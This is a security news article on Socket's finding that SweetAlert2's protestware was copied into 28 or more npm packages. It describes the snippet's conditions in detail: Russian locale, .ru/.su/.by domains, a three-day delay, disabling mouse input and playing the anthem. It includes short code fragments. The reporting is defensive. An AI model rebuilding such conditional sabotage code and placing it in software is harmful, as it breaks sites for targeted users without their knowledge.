Threat Actors Deploy 28+ Malicious Packages to Spread Protestware Scripts

Socket’s Threat Research Team has discovered a network of at least 28 malicious packages including protestware scripts, totaling approximately 2,000 copies, in a major escalation within the npm supply chain.

These packages, initially flagged in two instances for hidden functionality targeting Russian-language users on Russian or Belarusian domains, have proliferated across the ecosystem.

The protestware, classified under Socket’s alert system, disrupts user interface interactions by disabling mouse events and initiating playback of the Ukrainian national anthem, effectively rendering affected web pages non-functional for specific users.

This development highlights the risks of code reuse in open-source repositories, where undisclosed payloads can cascade through dependencies, amplifying potential impacts on downstream applications.

Discovery of Widespread Protestware

The malicious code manifests as a deeply embedded snippet within packages often exceeding 100,000 lines of code, typically positioned toward the end for obfuscation.

It employs a multifaceted conditional check: verifying the execution environment is a browser (via typeof window !== 'undefined'), confirming the navigator language matches Russian (/^rub/.test(navigator.language)), and ensuring the hostname aligns with targeted top-level domains (.ru, .su, .by, or .xn--p1ai).

Upon satisfaction of these criteria, the script leverages localStorage to track initiation timestamps, activating only after a three-day threshold to target repeat visitors.

This results in setting document.body.style.pointerEvents="none" to halt interactions, followed by dynamically creating and appending an audio element sourced from an external URL hosting the anthem, with looped playback initiated after a delay.

Such tactics not only protest geopolitical events but also pose integrity risks in client-side JavaScript environments, potentially violating accessibility standards like WAI-ARIA.

Supply Chain Propagation

The protestware’s origins trace back to SweetAlert2, a popular library boasting over 700,000 weekly downloads, which provides customizable dialog boxes as a replacement for native JavaScript popups.

Its maintainer, limonte, has transparently disclosed the functionality since version 11.6.14 published approximately three years ago amid Russia’s invasion of Ukraine and in all subsequent releases up to 11.22.2, including earlier versions like 9.17.3 and 11.6.6.

However, the script has propagated unintentionally to unrelated packages, likely through direct code copying, as evidenced by identical file structures and naming conventions.

This supply chain vulnerability affects diverse projects without any README acknowledgments, underscoring the perils of unvetted code integration.

Notable examples include packages like @starlawfirm/counsel-function (with 284 peak downloads, live across 13 versions), falcon-library-comp (1,822 downloads, versions 0.0.34–0.0.42), and currency_contry_exchange (1,276 downloads, versions 1.2.7–1.7.1), many of which remain active and have seen recent updates, such as @starlawfirm/counsel-function‘s version 0.0.12 published just 17 hours ago.

Others, like meshcentral (16,895 downloads, versions 1.1.32–1.1.44) and alurkerja-ui (1,521 downloads, spanning 572 versions), demonstrate broader reach, with some deprecated like starlawfirm-counsel-function-test.

According to the Report, Authors vary from individual developers to teams, with packages created from months to years ago, amplifying exposure.

Targeted users primarily include Russian-language speakers on affected domains, though the script’s repeat-visitor logic spares one-off accesses, potentially impacting researchers or global Russian speakers in regions like Kazakhstan or Ukraine.

This cascading effect from SweetAlert2 illustrates how protestware can inadvertently embed in enterprise tools, urging developers to audit dependencies rigorously and employ tools like Socket for proactive threat detection in the npm registry.

As of July 17, 2025, these findings emphasize the evolving landscape of software supply chain attacks, blending activism with technical sabotage.

Get Free Ultimate SOC Requirements Checklist Before you build, buy, or switch your SOC for 2025 - Download Now